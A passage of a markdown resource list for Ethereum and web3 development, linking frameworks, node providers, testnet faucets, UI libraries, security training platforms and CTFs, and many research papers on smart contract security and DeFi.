Landscape](https://page1.substack.com/p/the-zero-knowledge-landscape)\n- [Your Guide to Write zkSNARKs in Go](https://consensys.net/blog/research-development/gnark-your-guide-to-write-zksnarks-in-go)\n- [Building your first zk dapp using snarks & circom](https://hackernoon.com/how-to-use-a-zero-knowledge-dapp-boilerplate)\n- [ZK Tools Directory & Boilerplate](https://boilerplate.zkblock.app/)\n- [A beginner's intro to coding zero-knowledge proofs](https://dev.to/spalladino/a-beginners-intro-to-coding-zero-knowledge-proofs-c56)\n\n#### ZK-STARKs\n\n- [StarkWare](https://github.com/starkware-industries) and [StarkWare Resources](https://github.com/starkware-libs) - StarkEx scalability engine storing state transitions on-chain\n- [zkSNARKs vs zkSTARKs: a primer](https://pseudotheos.mirror.xyz/_LAi4cCFz2gaC-3WgNmri1eTvckA32L7v31A8saJvqg)\n- [Breaking Down Recursive ZK-STARKs](https://medium.com/@Nurnberg_Meistersinger/zk-starks-part-one-4f482111b0a)\n\n# Frameworks\n\n#### Truffle Suite\n\n- [Truffle](https://truffleframework.com/truffle)\n- [Ganache](https://truffleframework.com/ganache)\n- [Drizzle](https://truffleframework.com/drizzle)\n\n#### Akula\n\n- [Akula](https://github.com/akula-bft/akula) - an implementation of Ethereum protocol (""client"") written in Rust, based on [Erigon](https://github.com/ledgerwatch/interfaces) architecture.\n\n#### ZeppelinOS\n\n- [Getting Started](https://docs.zeppelinos.org/docs/start.html)\n\n#### Labs.Superblock\n\n> Note: Superblocks is depreciated\n\n- [Labs.superblocks](https://lab.superblocks.com/)\n- [dapp Tutorial](https://www.youtube.com/watch?v=LK-kVMzrdno)\n\n#### Infura (A Gateway to Ethereum)\n\n- [Mainnet End Point](https://infura.io/)\n- [Ropsten TestNet End Point](https://infura.io/)\n- [Kovan TestNet End Point](https://infura.io/)\n- [Rinkby TestNet End Point](https://infura.io/)\n- [IPFS](https://medium.freecodecamp.org/hands-on-get-started-with-infura-and-ipfs-on-ethereum-b63635142af0)\n\n#### [NodeReal](https://nodereal.io)(A high-performance node service)\n\n- [Meganode](https://meganode.nodereal.io)\n- [DirectRoute](https://directroute.nodereal.io)\n\n#### Other Frameworks\n\n- [Frameworks List](https://ethereum.org/en/developers/docs/frameworks/) - Ethereum Frameworks Listing.\n- [Hardhat](https://hardhat.org/) - Flexible, extensible and fast Ethereum development environment.\n- [Ape](https://docs.apeworx.io/ape/stable/) - The smart contract development tool for Pythonistas, Data Scientists, and Security Professionals.\n- [Brownie](https://github.com/iamdefinitelyahuman/brownie) - Brownie is a Python framework for deploying, testing and interacting with Ethereum smart contracts.\n- [Embark](https://github.com/embark-framework/embark) - Framework for DApp development\n- [Waffle](https://getwaffle.io/) - Framework for advanced smart contract development and testing, small, flexible, fast (based on ethers.js)\n- [Etherlime](https://github.com/LimeChain/etherlime) - ethers.js based framework for Dapp deployment\n- [Parasol](https://github.com/Lamarkaz/parasol) - [Depreciated] Agile smart contract development environment with testing, INFURA deployment, automatic contract documentation and more. It features a flexible and unopinionated design with unlimited customizability\n- [0xcert](https://github.com/0xcert/framework/) - JavaScript framework for building decentralized applications\n- [OpenZeppelin SDK](https://openzeppelin.com/sdk/) - OpenZeppelin SDK: A suite of tools to help you develop, compile, upgrade, deploy and interact with smart contracts.\n- [sbt-ethereum](https://sbt-ethereum.io/) - A tab-completey, text-based console for smart-contract interaction and development, including wallet and ABI management, ENS support, and advanced Scala integration.\n- [Cobra](https://github.com/cobraframework/cobra) - A fast, flexible and simple development environment framework for Ethereum smart contract, testing and deployment on Ethereum virtual machine(EVM).\n- [Ether Jar](https://github.com/emeraldpay/etherjar) Java integration library for Ethereum blockchain\n- [Starport](https://github.com/tendermint/starport) - A CLI tool for building sovereign IBC-enabled blockchains.\n- [Sign in with Ethereum | SIWE](https://github.com/spruceid/siwe)- Workflow to authenticate Ethereum accounts using message signing in order to establish a cookie-based web session that manages user metadata.\n- [Foundry](https://github.com/onbjerg/foundry-book) - A smart contract development toolchain for project compilation, dependency management, testing, deployments, on-chain interactions...\n- [Solmate](https://github.com/Rari-Capital/solmate) - These contracts have been audited but they were not developed with users in mind. They mainly seek to optimize gas and optimizations for smart contract development\n- [Supercool](https://docs.supercool.xyz/) - Relayer infra for meta-transaction and account-abstraction superpowers: automate smart contract interactions, create gasless transactions, and more.\n\n#### Interacting with Smart Contract\n\n- [Web3.js](https://web3js.readthedocs.io/en/1.0/)\n- [Web3.py](https://web3py.readthedocs.io/en/stable/)\n- [Web3j](https://docs.web3j.io/latest/)\n- [ethers.js](https://docs.ethers.io/v5/)\n- [Web3 by Example : Web3 by Example is a hands-on introduction to web3 development using annotated example programs.](https://www.web3byexample.com/)\n\n#### Python Ethereum Eco System\n- [Ethereum.org](https://ethereum.org/en/developers/docs/programming-languages/python/)\n- [Article](https://medium.com/@pipermerriam/the-python-ethereum-ecosystem-101bd9ba4de7)\n\n#### Distributed Storage Systems\n\n- [Arweave](https://arweave.org)\n- [INFO](https://medium.com/bitfwd/what-is-decentralised-storage-ipfs-filecoin-sia-storj-swarm-5509e476995f)\n- [IPFS](https://ipfs.io/)\n- [MESON](https://meson.network/)\n- [SWARM](https://swarm-gateways.net/)\n- [Storej](https://storj.io/)\n- [Sia](https://sia.tech/)\n\n#### Test Blockchain Networks\n\n- [Paradigm Faucet](https://faucet.paradigm.xyz) - claim testnet ETH here\n- [Ethnode](https://github.com/vrde/ethnode) - Run an Ethereum node (Geth or Parity) for development, as easy as `npm i -g ethnode && ethnode`.\n- [Ganache](https://github.com/trufflesuite/ganache) - App for test Ethereum blockchain with visual UI and logs\n- [Kaleido](https://kaleido.io/) - Use Kaleido for spinning up a consortium blockchain network. Great for PoCs and testing\n- [Besu Private Network](https://besu.hyperledger.org/en/stable/Tutorials/Quickstarts/Azure-Private-Network-Quickstart/) - Run a private network of Besu nodes in a Docker container\n- [Orion](https://github.com/PegaSysEng/orion) - Component for performing private transactions by PegaSys\n- [Artemis](https://github.com/PegaSysEng/artemis) - Java implementation of the Ethereum 2.0 Beacon Chain by PegaSys\n- [Cliquebait](https://github.com/f-o-a-m/cliquebait) - Simplifies integration and accepting testing of smart contract applications with docker instances that closely resembles a real blockchain network\n- [Local Raiden](https://github.com/ConsenSys/Local-Raiden) - Run a local Raiden network in docker containers for demo and testing purposes\n- [Private networks deployment scripts](https://github.com/ConsenSys/private-networks-deployment-scripts) - Out-of-the-box deployment scripts for private PoA networks\n- [Local Ethereum Network](https://github.com/ConsenSys/local_ethereum_network) - Out-of-the-box deployment scripts for private PoW networks\n- [Ethereum on Azure](https://docs.microsoft.com/en-us/azure/blockchain/templates/ethereum-poa-deployment) - Deployment and governance of consortium Ethereum PoA networks\n- [Ethereum on Google Cloud](https://console.cloud.google.com/marketplace/details/click-to-deploy-images/ethereum?filter=category:developer-tools) - Build Ethereum network based on Proof of Work\n- [Infura](https://infura.io/) - Ethereum API access to Ethereum networks (Mainnet, Ropsten, Rinkeby, Goerli, Kovan)\n- [CloudFlare Distributed Web Gateway](https://cloudflare.com/distributed-web-gateway/) - Provides access to the Ethereum network through the Cloudflare instead of running your own node\n- [Chainstack](https://chainstack.com/) - Shared and dedicated Ethereum nodes as a service (Mainnet, Ropsten, Rinkeby)\n- [Alchemy](https://alchemyapi.io/) - Blockchain Developer Platform, Ethereum API, and Node Service (Mainnet, Ropsten, Rinkeby, Goerli, Kovan)\n- [ZMOK](https://zmok.io/) - JSON-RPC Ethereum API (Mainnet, Rinkeby, Front-running Mainnet)\n- [Watchdata](https://watchdata.io) - Provide simple and reliable API access to Ethereum blockchain\n\n#### Test Ether Faucets\n\n- [Sepolia Faucet](https://sepoliafaucet.com/)\n- [Mumbai Faucet](https://mumbaifaucet.com/)\n- [Goerli faucet](https://goerli-faucet.slock.it/)\n- [Universal faucet](https://faucets.blockxlabs.com/)\n- [Nethereum.Faucet](https://github.com/Nethereum/Nethereum.Faucet) - A C#/.NET faucet\n\n# Front End\n\n#### UI Components\n\n- Learn React on [official website](https://reactjs.org/tutorial/tutorial.html) or complete some [courses](https://egghead.io/courses/the-beginner-s-guide-to-react)\n- [React Roadmap](https://github.com/adam-golab/react-developer-roadmap)\n- [aragonUI](https://ui.aragon.org) - A React library including Dapp components\n- [components.bounties.network](https://components.bounties.network) - A React library including Dapp components\n- [ui.decentraland.org](https://github.com/decentraland/ui) - A React library including Dapp components\n- [dapparatus](https://github.com/austintgriffith/dapparatus) - Reusable React Dapp components\n- [Metamask ui](https://github.com/MetaMask/metamask-storybook) - Metamask React Components\n- [DappHybrid](https://github.com/Nethereum/Nethereum.DappHybrid) - A cross-platform hybrid hosting mechanism for web based decentralised applications\n- [Nethereum.UI.Desktop](https://github.com/Nethereum/Nethereum.UI.Desktop) - Cross-platform desktop wallet sample\n- [eth-button](https://eth-button.github.io/eth-button/) - Minimalist donation button\n- [Rimble Design System](https://rimble.consensys.design/) - Adaptable components and design standards for decentralized applications.\n- [brave-ui](https://github.com/brave/brave-ui) - List of reusable React components to empower your brave UI\n- [DApp frontend security](https://blog.embarklabs.io/news/2020/01/30/dapp-frontend-security/index.html) - In this article, Author will take a look at security for DApps.\n\n# Project management\n\n- [Dework](https://dework.xyz/) | Web3 Trello with token payments, credentials, bounties...\n- [Wonderverse](https://www.wonderverse.xyz/) | Jira alternative with an intuitive task management system that allows DAOs to pay contributors and collaborate in their projects.\n\n# Important (security)\n\n- [Building Secure Smart Contracts](https://secure-contracts.com/)\n- [SCSVS](https://github.com/ComposableSecurity/SCSVS)\n- [Solidity audits and secure development material](https://github.com/jcr-security/solidity-security-teaching-resources)\n- [SCSVSv2](https://github.com/ComposableSecurity/SCSVS)\n- [Valuable Resources for Web3 Security](https://github.com/ZhangZhuoSJTU/Web3Bugs#valuable-resources-for-web3-security)\n\n# Further Readings\n\n#### Inspired by:\n\n- [ETH Dapp Developer Roadmap](https://github.com/thecryptoshed/eth-dapp-developer-roadmap)\n- [DeFi Defence DAO Tools](https://github.com/defi-defense-dao/defi-risk-tools-list#developer-tools)\n- [Blockchain Learning Path](https://github.com/protofire/blockchain-learning-path)\n- [ADF](https://github.com/ong/awesome-decentralized-finance)\n- [DeFi Toolkit](https://github.com/gweicz/defi-toolkit)\n- [BlockTools](https://github.com/nujabes403/blockchains-tools)\n- [SAW List](https://simpleaswater.com/defi/#analytics)\n- [Public APIs](https://github.com/public-apis/public-apis#cryptocurrency)\n- [BTC List](https://github.com/igorbarinov/awesome-bitcoin)\n- [ConsenSys](https://github.com/ConsenSys/ethereum-developer-tools-list)\n- [EVM Tools](https://github.com/CoinCulture/evm-tools)\n- [Solidity Pro](https://github.com/bkrem/awesome-solidity)\n- [Zhihu Research Base](https://zhuanlan.zhihu.com/p/265374061)\n- [OpenZeppelin - Contracts / Test Helpers + More ](https://github.com/OpenZeppelin)\n- [Awesome Ethereum Resource Lists](https://medium.com/quiknode/awesome-ethereum-resource-lists-dd28a9c17fc1)\n- [Comprehensive Ethereum Developer Resource List](https://github.com/ConsenSys/ethereum-developer-tools-list/blob/master/README.md)\n- [Smart Contract Learning](https://github.com/arbazkiraak/SmartContractLearning)\n- [Awesome Cryptoeconomics](https://github.com/jpantunes/awesome-cryptoeconomics)\n- [Tudelft Repo](https://repository.tudelft.nl)\n- [The Reading List](https://www.decentralised.co/the-reading-list) and [This repo](https://github.com/sambacha/compendium) with [Engineering Data List](https://github.com/sambacha/art-of-engineering/blob/master/ENGINEERING_ART_OF.md)\n- [Eth Reentrancy Attack Patterns](https://github.com/uni-due-syssec/eth-reentrancy-attack-patterns)\n- [Plugin for testing smart contracts](https://github.com/meherett/pytest-eth)\n- [Solidity function profiler](https://github.com/EricR/sol-function-profiler)\n- [Smart Contract Attack Vectors](https://github.com/KadenZipfel/smart-contract-attack-vectors)\n- [DeFi security list](https://github.com/freight-chain/defi-sec)\n- [DeFi Threats Base](https://github.com/freight-trust/defi-threat)\n- [Hacking](https://github.com/geekshiv/Smart-Contract-Hacking)\n- [Secureum Bootcamp](https://hackmd.io/@secureum/bootcamp-epoch0-announcement)\n- [SCSVS](https://github.com/securing/SCSVS)\n- [Smart Contract Inspector](https://github.com/tintinweb/smart-contract-inspector)\n- [Blocksec ctfs](https://github.com/openblocksec/blocksec-ctfs)\n- [Builder List](https://based.builders)\n- [From 0 to Web3.0](https://github.com/kay-is/web3-from-zero)\n\n#### Security & Safety:\n\n- [All known smart contract side and user side attacks](https://graph.org/All-known-smart-contract-side-and-user-side-attacks-and-vulnerabilities-in-Web30--DeFi-03-31)\n- [All ETH Sec tools existing](https://graph.org/ETHSec-Tools-02-13)\n- [Solidity Cheatsheet Pack](https://graph.org/Solidity-Cheatsheets-Pack-03-20)\n- [All about NFT security](https://graph.org/NFT-security-01-28)\n- [Visit my Blog](https://officercia.mirror.xyz/Uc1sf64yUCb0uo1DxR_nuif5EmMPs-RAshDyoAGEZZY)\n- [Visit blog.pessimistic.io](https://blog.pessimistic.io/)\n- [All resources to become a smart contract auditor!](https://telegra.ph/All-resources-to-become-a-smart-contract-auditor-09-11)\n- [How to become a smart contract auditor](https://cmichel.io/how-to-become-a-smart-contract-auditor)\n- [Blockchain Security Genesis](https://devansh.xyz/blockchain-security/2021/09/17/genesis-0x01.html)\n- [Intro security hacking smart contracts on Ethereum](https://www.notonlyowner.com/learn/intro-security-hacking-smart-contracts-ethereum)\n- [Books & Researches](https://telegra.ph/Books--Researches-01-30)\n- [Per Aspera ad Astra](https://officercia.mirror.xyz/FvMKbibx7gDlufgZSkmYn77CI8HPBsVCeqUKmpXHr0k)\n\n#\n\n- [Blockchain Security Roadmap](https://devansh.xyz/blockchain-security/2021/09/17/genesis-0x01.html) - This article will be laying down a path/roadmap, following which users will easily enter into the field of Blockchain Security together.\n- [ The Eye of Horus: Spotting and Analyzing Attacks on Ethereum Smart Contracts](https://arxiv.org/pdf/2101.06204.pdf) -Investigation shows that the number of attacks did not necessarily decrease over the past few years, but for some vulnerabilities remained constant.\n- [Analysis of Bitcoin Vulnerability to Bribery Attacks Launched Through Large Transactions](https://arxiv.org/pdf/2105.07501.pdf) - In this paper, authors design a novel bribery attack and show that this guarantee can be hugely undermined.\n- [Vulnerability of Blockchain Technologies to Quantum Attacks](https://arxiv.org/pdf/2105.01815.pdf) - Here authors analyze the major blockchain-based cryptocurrencies deployed today -- including Bitcoin, Ethereum, Litecoin and ZCash, and determine risk exposure to quantum attacks.\n- [BLOCKEYE](https://arxiv.org/pdf/2103.02873.pdf) - Hunting For DeFi Attacks on Blockchain. In this paper, authors proposed BLOCKEYE, a real-time attack detection system for DeFi projects on the Ethereum blockchain.\n- [Topological Anomaly Detection in Dynamic Multilayer Blockchain Networks](https://arxiv.org/pdf/2106.01806.pdf) - Authors introduce a new topological perspective to structural anomaly detection in dynamic multilayer networks.\n- [Verification of the Incremental Merkle Tree Algorithm with Dafny](https://arxiv.org/pdf/2105.06009.pdf) - Authors present our new and original correctness proof of the algorithm along with the Dafny machine-checkable version.\n- [GoHammer Blockchain Performance Test Tool](https://arxiv.org/pdf/2105.00847.pdf) - This tool will help in developing more efficient decentralized systems and will affect decreasing the costs of developing decentralized application projects.\n- [EtherClue: Digital investigation of attacks on Ethereum smart contracts ](https://arxiv.org/pdf/2104.05293.pdf) - In this work, authors study the problem of post-factum investigation of Ethereum attacks using Indicators of Compromise specially crafted for use in the blockchain.\n- [Requirement Analyses and Evaluations of Blockchain Platforms per Possible Use Cases](https://arxiv.org/pdf/2103.03209.pdf) - This document provides a generic model of understanding blockchain and its applications.\n- [A Note on Privacy in Constant Function Market Makers](https://arxiv.org/pdf/2103.01193.pdf) - In this note, authors show that privacy is impossible with the usual implementations of CFMMs under most reasonable models of an adversary and provide some mitigating strategies.\n- [A Survey of Security Vulnerabilities in Ethereum Smart Contracts](https://arxiv.org/pdf/2105.06974.pdf) - This paper explains eight vulnerabilities that are specific to the application level of BT by analyzing the exploitation case scenarios of these vulnerabilities.\n- [An approach to detect Denial of Service Vulnerability in Ethereum Smart Contracts](https://arxiv.org/pdf/2106.01340.pdf) - In this paper, authors propose a framework that combines static and dynamic analysis to detect DoS due to an unexpected revert in ETH Smart Contracts.\n- [AGSolT: a Tool for Automated Test-Case Generation for Solidity Smart Contracts](https://arxiv.org/pdf/2102.08864.pdf) - Authors found that AGSolT is capable of achieving high branch overage with both approaches and even discovered some errors in some of the most popular Solidity smart contracts on Github.\n- [Temporal-Amount Snapshot MultiGraph for Ethereum Transaction Tracking](https://arxiv.org/pdf/2102.08013.pdf) - Authors propose TASMG to model Ethereum transaction records as a temporal-amount network and then present TAW to effectively embed accounts via their transaction records, which integrates temporal and amount information of the proposed network.\n- [Demystifying Cryptocurrency Mining Attacks: A Semi-supervised Learning Approach Based on Digital Forensics and Dynamic Network Characteristics](https://arxiv.org/pdf/2102.10634.pdf) - This paper addresses the detection of crypto mining attacks in a generic network environment using dynamic network characteristics.\n- [FASTEN: Fair and Secure Distributed Voting Using Smart Contracts](https://arxiv.org/pdf/2102.10594.pdf) - Authors prove that the probability of privacy breaches is negligibly small. Further, cost analysis of executing FASTEN over Ethereum is comparable to most of the existing cost of elections.\n- [Interdependencies between Mining Costs, Mining Rewards and Blockchain Security](https://arxiv.org/pdf/2102.08107.pdf) - This paper studies to what extent the cost of operating a proof-of-work blockchain is intrinsically linked to the cost of preventing attacks, and to what extent the underlying digital ledger security budgets are correlated with the cryptocurrency market outcomes\n- [HyperSec: Visual Analytics for blockchain security monitoring](https://arxiv.org/pdf/2103.14414.pdf) - HyperSec, a visual analytics monitoring tool that provides relevant information at a glance to detect ongoing attacks on Hyperledger Fabric.\n- [Reentrancy Vulnerability Identification in Ethereum Smart Contracts](https://arxiv.org/pdf/2105.02881.pdf) - In this paper, authors present a framework that combines static and dynamic analysis to detect Reentrancy vulnerabilities in Ethereum smart contracts.\n- [A General Framework for the Security Analysis of Blockchain Protocols](https://arxiv.org/pdf/2009.09480v2.pdf) - This paper presents a parsimonious abstraction sufficient for capturing and comparing properties of many well-known permissionless blockchain protocols.\n- [Coinbugs: Enumerating Common Blockchain Implementation-Level Vulnerabilities](https://arxiv.org/pdf/2104.06540.pdf) - The paper is aimed at security testers aiming to start out in blockchain security reviews and blockchain developers as a reference on common pitfalls.\n- [Vulnerabilities and Open Issues of Smart Contracts: A Systematic Mapping](https://arxiv.org/pdf/2104.12295.pdf) - This paper conducted a systematic literature mapping identifying initiatives and tools to analyze SCs and how to deal with the identified vulnerabilities.\n- [SuMo: A Mutation Testing Strategy for Solidity Smart Contracts](https://arxiv.org/pdf/2105.03626.pdf) - Authors report a first evaluation of SuMo on open-source projects for which test suites were available. The results authors got are encouraging, and they suggest that SuMo can effectively help developers to deliver more reliable smart contracts.\n- [(In)Stability for the Blockchain: Deleveraging Spirals and Stablecoin Attacks](https://arxiv.org/pdf/1906.02152.pdf) - The possibility of deleveraging spirals was first predicted in the initial release of this paper in 2019 and later observed in the Black Thursday crisis in Dai in 2020.\n- [An Anonymous Trust-Marking Scheme on Blockchain Systems](https://arxiv.org/pdf/2010.00206.pdf) - In this paper, authors propose an anonymous trust-marking scheme on blockchain systems that is universally applicable to any cryptocurrency.\n- [A Framework and DataSet for Bugs in Ethereum Smart Contracts](https://arxiv.org/pdf/2009.02066.pdf) - In this paper, to fill the gap, authors first collect as many smart contract bugs as possible from multiple sources and divide these bugs into 9 categories by extending the IEEE Standard Classification for Software Anomalies.\n- [Bitwise Operations and Bit Manipulation in Solidity, Ethereum](https://medium.com/@imolfar/bitwise-operations-and-bit-manipulation-in-solidity-ethereum-1751f3d2e216)\n- [BitMaps](https://soliditydeveloper.com/bitmaps)\n- [Reentrancy Guard 2.0](https://medium.com/spherex-technologies/reentrancy-guard-2-0-cbbc0be41634)\n- [A Secure Multi-chains Consensus Scheme Against Diverse Miners Behaviors Attacks in Blockchain Networks.](https://arxiv.org/pdf/2106.02383.pdf) - Experimental results show that PoDT is secure against DMB attacks and more effective than traditional consensus schemes in multi-chains environments.\n- [A Survey on Consortium Blockchain Consensus Mechanisms](https://arxiv.org/pdf/2102.12058.pdf) - This paper highilights several state-of-the art solutions in consensus algorithms for enterprise blockchain.\n- [Extracting Smart Contracts Tested and Verified in Coq](https://arxiv.org/pdf/2012.09138.pdf) - Authors implement extraction of Coq programs to functional languages based on MetaCoq's certified erasure.\n- [Trustless, privacy-preserving blockchain bridges](https://arxiv.org/pdf/2102.04660.pdf) - In this paper, authors present a protocol for facilitating trust-less cross-chain cryptocurrency transfers that preserve privacy of bridge withdrawals.\n- [Security checklists for Ethereum smart contract development: patterns and best practices](https://arxiv.org/pdf/2008.04761.pdf) - Authors cover the phases of design, coding, and testing and deployment of the software lifecycle.\n- [Dynamic Vulnerability Detection on Smart Contracts Using Machine Learning](https://arxiv.org/pdf/2102.07420.pdf) - In this work authors propose Dynamit, a monitoring framework to detect reentrancy vulnerabilities in Ethereum smart contracts.\n- [Targeting the Weakest Link: Social Engineering Attacks in Ethereum Smart Contracts](https://arxiv.org/pdf/2105.00132.pdf) - In this work, authors explore the possibility and existence of new social engineering attacks beyond smart contract honeypots.\n- [OptSmart: A Space Efficient Optimistic Concurrent Execution of Smart Contracts](https://arxiv.org/pdf/2102.04875.pdf) - In this paper, authors develop a concurrent miner that proposes a block by executing the AUs concurrently using optimistic Software Transactional Memory systems (STMs).\n- [DEFECTCHECKER: Automated Smart Contract Defect Detection by Analyzing EVM Bytecode](https://arxiv.org/pdf/2009.02663.pdf) - Experimental results show that DefectChecker performs much better than these tools in terms of both speed and accuracy.\n- [SmartBugs: A Framework to Analyze Solidity Smart Contracts](https://arxiv.org/pdf/2007.04771.pdf) - Authors show how it enables easy integration and comparison of analysis tools by presenting a new extension to the tool SmartCheck that improves substantially the detection of vulnerabilities related to the DASP10 categories Bad Randomness, Time Manipulation, and Access Control (identified vulnerabilities increased from 11% to 24%).\n- [Profiling Gas Leaks in Solidity Smart Contracts](https://arxiv.org/pdf/2008.05449.pdf) - In this paper, authors identify a set of 19 Solidity code smells affecting the deployment and transaction costs of a smart contract, and assess the relevance of such smells through a survey involving 34 participants.\n- [Securing Parallel-chain Protocols under Variable Mining Power](https://arxiv.org/pdf/2105.02927.pdf) - In this paper, authors consider the design of provably secure parallel-chain protocols which can adapt to such mining power variations.\n- [Ethereum SmartContract Vulnerability Detection using Deep Neural Network and Transfer Learning](https://arxiv.org/pdf/2103.12607.pdf) - ESCORT framework enables transfer learning on new vulnerability types with minimal modification of the DNN model architecture and re-training overhead.\n- [SCSGuard: Deep Scam Detection for Ethereum Smart Contracts](https://arxiv.org/pdf/2105.10426.pdf) - Experimental results manifest that SCSGuard achieves high accuracy (0.94), precision (0.96\%) and recall (0.98) for both Ponzi and Honeypot scams, and new Phishing smart contracts.\n- [Securing Cyber-Physical Systems Through Blockchain-Based Digital Twins and Threat Intelligence](https://arxiv.org/pdf/2105.08886.pdf) - This article focuses on securing CPSs by integrating Artificial Intelligence (AI) and blockchain for intelligent and trusted DTs.\n- [A Survey on Blockchain Interoperability: Past, Present, and Future Trends](https://arxiv.org/abs/2005.14282) - In this post, authors study blockchain interoperability techniques and solutions, providing a holistic overview of blockchain interoperability, paving the way for systematic research in this domain.\n- [SoK: Transparent Dishonesty: front-running attacks on Blockchain](https://arxiv.org/abs/2106.00667) - A paper on secure smart contract designs decisions and front-running possibilities on DApps.\n- [SoK: Oracles from the Ground Truth to Market Manipulation](https://arxiv.org/abs/2106.00667) - A paper that systemizes the design alternatives for oracles, showcases attacks, and discusses attack mitigation strategies.\n\n##### Web2 cybersecurity\n\n- [TryHackMe: Complete rooms with challenges and puzzles to break, all from the browser](https://tryhackme.com/welcome) - Hands on cybersecurity training with real-world tasks\n- [Disclose: Cross-industry and vendor-agnostic standards for best practives in cybersecurity research](https://disclose.io/) - Open source maintainers and industry experts providing a central source for assistance, information, and help via templates, tools, data sets...\n- [Hack The Box](https://www.hackthebox.com/) - A Hacker's playground to dynamically and compete against other users in a collaborative ecosystem that promotes hands-on training experience\n- [OverTheWire](https://overthewire.org/wargames/) - Set of wargames and challenges offered by a community to learn and practice security concepts in fun wargames.\n- [Pentesterlab](https://pentesterlab.com/) - Hands-on labs covering different bu classes from basic to advanced.\n- [Portswigger labs](https://portswigger.net/web-security/all-labs) - Set of web application secrity labs with attached community solutions\n- [Vulnhub](https://www.vulnhub.com/) - Users upload ""challenge boxes"" that often attempt to gain root access by exploiting known vulnerabilities.\n\n##### Web3 cybersecurity\n\n- [Ethernaut by OpenZeppelin](https://ethernaut.openzeppelin.com/) - A collection of Web3 wargamees inspired by [OverTheWire](https://overthewire.org/) in the context of the Ethereum Virtual Machine (EVM). Each level is a smart contract that needs to be hacked.\n- [Damn Vulnerable Defi](https://www.damnvulnerabledefi.xyz/) - An offensive security playground to learn red team cybersecurity in the context of DeFi and smart contracts. Examples include tasks where the users needs to stop the system from working, take out funds from a contract...\n- [Damn Vulnerable DeFi | Foundry](https://github.com/nicolasgarcia214/damn-vulnerable-defi-foundry) - Same as Damn Vulnerable DeFi but in the context of the foundry development framework.\n\n##### Web3 CTF (Capture The Flag)\n\n- [Capture the Ether](https://capturetheether.com/) - Traditional game consisting of a series of categorized challenges where the user earns points after every succesful challenge. The goal is to make the `isComplete()` function return true.\n- [Paradigm CTF](https://ctf.paradigm.xyz/)\n\n#### DeFI\n\n- [Finematics](https://www.youtube.com/c/Finematics/featured) - Educational videos on DeFi\n- [Formal Analysis of Composable DeFi Protocols ](https://arxiv.org/pdf/2103.00540.pdf) - In this paper, authors propose a formal process-algebraic technique that models DeFi protocols in a compositional manner to allow for efficient property verification.\n- [Transaction Fee Mechanism Design](https://arxiv.org/pdf/2106.01340.pdf) - Authors explain the behavior of fees in blockchains.\n- [DeFi-ning DeFi: Challenges & Pathway](https://arxiv.org/pdf/2101.05589.pdf) - Good Retrospective into the beginning of decentralized finance.\n- [A theory of Automated Market Makers in DeFi](https://arxiv.org/pdf/2102.11350.pdf) - Authors exploit our theory to formally prove a set of fundamental properties of AMMs, characterizing both structural and economic aspects.\n- [From banks to DeFi: the evolution of the lending market](https://arxiv.org/pdf/2104.00970.pdf) - Authors discuss the persisting reliance of DeFi lending on the traditional financial system, and conclude with the outlook of the lending market in the IOV era.\n- [On the Just-In-Time Discovery of Profit-Generating Transactions in DeFi Protocols](https://arxiv.org/pdf/2103.02228.pdf) -In this paper, authors investigate two methods that allow them to automatically create profitable DeFi trades.\n- [Maximizing Extractable Value from Automated Market Makers](https://arxiv.org/pdf/2106.01870.pdf) - In this paper authors formally characterize rational miners as players which follow an optimal strategy in the mining game.\n- [The Decentralized Financial Crisis](https://arxiv.org/pdf/2002.08099.pdf) - In this paper authors explore how design weaknesses and price fluctuations in DeFi protocols could lead to a DeFi crisis.\n- [Liquidations: DeFi on a Knife-edge](https://arxiv.org/pdf/2009.13235v4.pdf)- In order to protect protocols from suffering losses, undercollateralized positions can be liquidated. In this paper, authors present empirical analysis of liquidations on protocols for loanable funds (PLFs).\n- [Measuring Asset Composability as a Proxy for DeFi Integration](https://arxiv.org/pdf/2102.04227.pdf) - Authors seek to understand the degree to which this practice may contribute to financial integration on Ethereum by examining transactions in 'composed' derivatives for the assets DAI, USDC, USDT, ETH and tokenized BTC for the full set of 344.8 million Ethereum transactions computed in 2020.\n- [Dynamic Curves for Decentralized Autonomous Cryptocurrency Exchanges](https://arxiv.org/pdf/2101.02778.pdf) - Authors propose in this work a new approach to constructing the AMM by proposing the idea of dynamic curves.\n- [High-Frequency Trading on Decentralized On-Chain Exchanges](https://arxiv.org/pdf/2009.14021.pdf) - In this work authors formalize, analytically exposit and empirically evaluate an augmented variant of front-running: sandwich attacks, which involve front- and back-running victim TXs.\n- [Flashot](https://arxiv.org/pdf/2102.00626.pdf) - A Snapshot of Flash Loan Attack on DeFi Ecosystem.\n- [DeFiRanger](https://arxiv.org/pdf/2104.15068.pdf) - Detecting Price Manipulation Attacks on DeFi Applications.\n- [Attacking the DeFi Ecosystem with Flash Loans for Fun and Profit](https://arxiv.org/pdf/2003.03810.pdf) - Flash Loans. DeFi. Classic.\n- [SoK: Decentralized Finance (DeFi) ](https://arxiv.org/pdf/2101.08778.pdf) - In this Systematization of Knowledge (SoK), authors delineate the DeFi ecosystem along its principal axes. SCSGuard: Deep Scam Detection for Ethereum Smart Contracts\n- [Empirical Evidence from four Governance Token Distributions](https://arxiv.org/pdf/2102.10096.pdf) - This paper provides a framework to quantify decentralization of governance power among blockchain applications.\n- [The Adoption of Blockchain-based Decentralized Exchanges](https://arxiv.org/pdf/2103.08842.pdf) - Authors show that liquidity providers lose token value if exchange rates are volatile due to the order execution mechanism of the blockchain-based exchange.\n- [An analysis of Uniswap markets](https://arxiv.org/pdf/1911.03380.pdf) -One of the best studies on Uniswap DEX activity, authors started researching in 2019 and recently released fresh 2021 analysis.\n- [Finance 4.0: Design principles for a value-sensitive cryptoecnomic system to address sustainability](https://arxiv.org/pdf/2105.11955.pdf) - Authors provide new insights on designing crypto systems.\n- [Behavior of Liquidity Providers in Decentralized Exchanges](https://arxiv.org/pdf/2105.13822.pdf) - Authors aim to understand how liquidity providers react to market information and how they benefit from providing liquidity in DEX.\n- [Cyclic Arbitrage in Decentralized Exchange Markets](https://arxiv.org/pdf/2105.02784.pdf) - Good Read. This paper suggests that with the smart contract technology and the replicated state machine setting of Ethereum, arbitrage strategies are easier implemented in DEXes than in CEX.\n- [SoK: Oracles from the Ground Truth to Market Manipulation](https://arxiv.org/pdf/2106.00667.pdf) - In this SoK, authors systemize the design alternatives for oracles, showcase attacks, and discuss attack mitigation strategies.\n- [Composing Networks of Automated Market Makers](https://arxiv.org/pdf/2106.00083.pdf) - This paper proposes a mathematical model for AMM composition.\n- [Blockchain Oracle Design Patterns](https://arxiv.org/abs/2106.09349) - In this paper, authors will study and analyze blockchain oracles with regard to 